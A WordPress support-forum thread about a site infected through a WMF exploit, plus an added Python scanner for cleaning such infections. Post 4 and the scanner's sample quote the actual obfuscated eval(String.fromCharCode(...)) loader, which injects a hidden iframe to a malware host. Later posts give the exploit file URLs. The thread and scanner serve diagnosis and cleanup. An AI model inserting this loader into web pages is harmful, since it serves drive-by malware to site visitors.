WordPress.org

possible exploit in tinymce js (14 posts)

  1. Duvy
    Member
    Posted 8 years ago

    Hi, everyone, I've been using wordpress for almost a year now to run my magazine site and soon after I upgraded to 2.0 the other day and a day or so later a bot used one of the javascripts to insert an exploit (the wmf exploit that is on the news) to every php and html file in my account. It then began trying to serve the exploit to my visitors from a url that I won't post because it is direct to the wmf file. I'm protected against it and the only way I even notice it is anti-vir kept giving me warnings. I have screenshots of the warnings. My site is hosted at powweb and they kept turning off my wordpress database telling me it was abusing the system, so I restored a backup and that seemed to stop it, but when I went into wordpress to write a post and clicked the edit html button on the tinymce quicktags, it started all over again. Does anyone know if this is a possible exploit in tinymce js and has anyone else had this problem? How can I get rid of it? I deleted tinymce from my server, just in case.
    thanks in advance for any help I may receive.

  2. Mark (podz)
    Support Maven
    Posted 8 years ago

    "a bot used one of the javascripts to insert an exploit (the wmf exploit that is on the news) to every php and html file in my account"

    That sounds like a host that does things on the cheap and does not take server security into consideration.

    Move hosts.

    I'll let someone with more knowledge definitely shoot this down, but from others who have had this WMF exploit, it's because of the shared hosting environment and some pathetic script-kiddie. There is nothing here to implicate WP.

    Powweb ... take your money elsewhere.

  3. Mark (podz)
    Support Maven
    Posted 8 years ago

    To deal with it - you need to delete every file that is infected.

    Download everything.
    Delete certainly all the WP files
    Upload new
    Check non-wp files and upload if clean.

    Or

    If you are on Windows, download everything (literally) then use a search program like Agent Ransack to search for the url that users are being directed to. That will show what and where to clean.

    Agent Ransack:
    http://www.mythicsoft.com/agentransack/default.aspx
    Freeware.

  4. Duvy
    Member
    Posted 8 years ago

    I've already cleaned it up twice, deleting the entire site, cleaning every file with multi-replace, checking them to make sure the code is gone from each page, restoring a backup, and it goes away, but then when I use the feature rich text editor, it starts again.
    this is the code that was replicating into every php and html in my site

    eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,115,101,97,114,99,104,105,110,103,119,119,119,46,110,101,116,47,114,101,118,101,114,115,101,95,102,117,110,46,104,116,109,108,34,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,98,111,114,100,101,114,61,48,32,102,114,97,109,101,98,111,114,100,101,114,61,48,62,60,47,105,102,114,97,109,101,62,39,41))

    This is the code (translated):

    Code:
    'document.write(\'<iframe src="http://searchingwww.net/reverse_fun.html" height=0 width=0 border=0 frameborder=0></iframe>\')'

    now that I have removed tinymce completely it has stopped, but I'm worried that won't stop this from happening in the future and maybe it is happening seamlessly to other sites, like I mentioned, I would not have detected it if I wasn't using zone alarm/antivir, it would have slipped the file into my temporary internet folder without even asking me. Honestly, I have never had trouble with powweb until upgrading wordpress a few days ago. I'm not blaming wordpress or anything, just bots and hackers, but I like using tinymce and I want to block it, or get that site pulled so they can't do it anymore. :-( Any suggestions?
    thanks for all your help!

    edit: I also tested in 3 browsers and it affected all of them, so it isn't just IE.
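As an added example (not code from this thread, WordPress or TinyMCE), here is a Python scanner that does podz's "search for the url" step and Duvy's hand-decoding in one pass over a downloaded copy of the site: it decodes every String.fromCharCode(...) blob, flags zero-sized iframes inside the decoded text, and reports any URL already known from an earlier clean-up. The sample file contents are constructed around the payload quoted above; a plain substring search for the URL misses the obfuscated copy, which is why the decoder runs first.

```python
import re
import sys
from pathlib import Path

# Matches String.fromCharCode(100,111,...) with optional whitespace between codes.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")
# A zero-height or zero-width iframe is the tell-tale of a hidden drive-by loader.
HIDDEN_IFRAME_RE = re.compile(
    r"""<iframe[^>]*src=["']?([^"'\s>]+)[^>]*(?:height=0|width=0)""", re.IGNORECASE)

# Constructed PHP file wrapping the exact payload quoted in the thread above.
SAMPLE_INFECTED = (
    "<?php get_header(); ?>\n<script>eval(String.fromCharCode("
    "100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,"
    "115,114,99,61,34,104,116,116,112,58,47,47,115,101,97,114,99,104,105,110,103,119,119,119,46,"
    "110,101,116,47,114,101,118,101,114,115,101,95,102,117,110,46,104,116,109,108,34,32,104,101,"
    "105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,98,111,114,100,101,114,61,48,32,102,"
    "114,97,109,101,98,111,114,100,101,114,61,48,62,60,47,105,102,114,97,109,101,62,39,41))"
    "</script>\n")

def decode_fromcharcode(text):
    """Decode every String.fromCharCode(...) argument list found in text."""
    return ["".join(chr(int(n)) for n in m.group(1).split(","))
            for m in FROMCHARCODE_RE.finditer(text)]

def find_hidden_iframes(text):
    """Return the src of every zero-sized iframe in text."""
    return [m.group(1) for m in HIDDEN_IFRAME_RE.finditer(text)]

def scan_text(text, known_urls=()):
    """Return (kind, detail) findings for one file's contents; [] if clean."""
    findings = []
    for payload in decode_fromcharcode(text):
        findings.append(("obfuscated-js", payload))
        findings += [("hidden-iframe", u) for u in find_hidden_iframes(payload)]
    # Un-obfuscated copies of the loader, and URLs already known from a prior clean-up.
    findings += [("hidden-iframe", u) for u in find_hidden_iframes(text)]
    findings += [("known-url", u) for u in known_urls if u in text]
    return findings

def scan_tree(root, known_urls=(), suffixes=(".php", ".html", ".htm", ".js")):
    """Walk a downloaded site copy and map each infected path to its findings."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_text(path.read_text(errors="replace"), known_urls)
            if found:
                hits[str(path)] = found
    return hits

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, found in scan_tree(root, known_urls=("searchingwww.net",)).items():
        print(path, *[f"  {kind}: {detail}" for kind, detail in found], sep="\n")
```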

  5. Mark (podz)
    Support Maven
    Posted 8 years ago

    I just went to that site (I'm reckless) and there seems to be nothing there now.

    Are you sure you are fully deleting the server stuff, downloaded a new WP from here, cleared all caches etc ?

  6. Duvy
    Member
    Posted 8 years ago

    yeah it looks blank if you don't have a program to alert you that it is there. I get a warning in antivir that says the site is trying to install reverse_fun.wmf which is a known exploit/virus. If you view the source on that page it links to http:// cc.ad-ware .cc/dia489/ lau.jpg which is nothing also. If you have anti-virus software I suggest you update it and run it, just in case, because it installs seamlessly you won't notice until it's messing things up. I patched windows when the patch hit microsoft update and it still almost infected my PC. Could it have gotten into my database? I haven't installed a new copy of wordpress because if it's in the database it will just start again and right now I have it contained. I'm not too good with mysql so I'm not sure how to check.
    edit: if you are not sure please don't follow that above image.

  7. Mark (podz)
    Support Maven
    Posted 8 years ago

    I've broken the image link.

  8. Duvy
    Member
    Posted 8 years ago

    it does look like it's gone down since a few hours ago but the image with the exploit in it is still there http://searchingwww.net/reverse_fun
    try adding .wmf to the end of that url in place of .html and a graphic tries to download which is the actual exploit. This is what is popping up in my browser 82.179.170.11/dia489
    and that site is still there.

  9. whooami
    Member
    Posted 8 years ago

    for a very critical analysis of what you are seeing, read this:

    http://www.mnin.org/write/2005_jpegtodll.html

  10. Duvy
    Member
    Posted 8 years ago

    So how exactly is it getting into my website? I've used hijack this and anti-virus software, three browsers, system restore, ad-aware, spybot and a few other programs and it isn't showing on my harddrive or windows system files anywhere. IE hasn't been changed on my PC at all. I was in the middle of writing a post when it started. :-(

  11. whooami
    Member
    Posted 8 years ago

    do you have access to your server's raw logs? if so, I would love to take a look at them. Of course, depending on your time, the downloadable copy won't have "today's" hits in them.

  12. Duvy
    Member
    Posted 8 years ago

    I have access to logs in ftp and logs in the user manager, not sure if they are raw or cleaned up for dummies. The exploit attack was wednesday and thursday. I was awake for 27 hours trying to find out how they did it. How should I send or show the logs? Would be grateful for any help.
    my site is
    http://www.darkfaeryglitter.org and wordpress is at
    http://blog.darkfaeryglitter.org

  13. whooami
    Member
    Posted 8 years ago

    ohh, well if it happened then, yes it would all be in your server logs, if you like feel free to send a copy of the tar.gz to logs AT village-idiot.org.

    Honestly a good look at what exactly goes on server side would be very interesting...

    and yes, they should be raw apache logs

    if it's easier for you you could even post the tar.gz on your site, provide the link, and I'll download it. Whichever is easiest.

  14. whooami
    Member
    Posted 8 years ago

    duvy, got your email, the logs, and I replied. Thank you again, hopefully I might shed some light on what happened.

This topic has been closed to new replies.

About this Topic